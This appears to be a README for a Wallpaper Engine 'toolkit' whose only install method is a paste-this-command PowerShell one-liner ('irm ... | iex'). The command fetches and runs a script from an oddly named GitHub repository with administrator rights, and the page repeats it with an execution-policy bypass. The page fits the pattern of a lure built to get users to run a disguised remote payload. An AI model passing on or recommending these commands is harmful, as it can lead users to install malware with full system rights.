Quick-deploy toolkit for creating and managing dynamic wallpapers in Wallpaper Engine — templates, asset tools, and project scaffolding.
Open PowerShell and run:
irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iexThat's it. The installer handles everything.
- Requests administrator rights for system-wide installation.
- Downloads the Dynamic Wallpaper Toolkit bundle (templates, scripts, asset organizer).
- Extracts the project scaffold to
Documents\WallpaperProjects. - Registers shell integration for right-click → 'New Wallpaper Project'.
- Windows 10 / 11 (64-bit)
- PowerShell 5.1+
- Wallpaper Engine (Steam or MS Store)
- Python 3.8+ (for template scripts)
- ~2 GB free disk space
Shell extension not working
Log out and back in — Explorer needs to reload extensions.
Templates folder is empty
Re-run the installer with --templates to force re-download.
Wallpaper Engine doesn't see my projects
Point WE's project folder to Documents\WallpaperProjects\output.
Alternative (bypass execution policy):
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex""irm is not recognized" — old PowerShell. Use:
Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-ExpressionMIT — see LICENSE.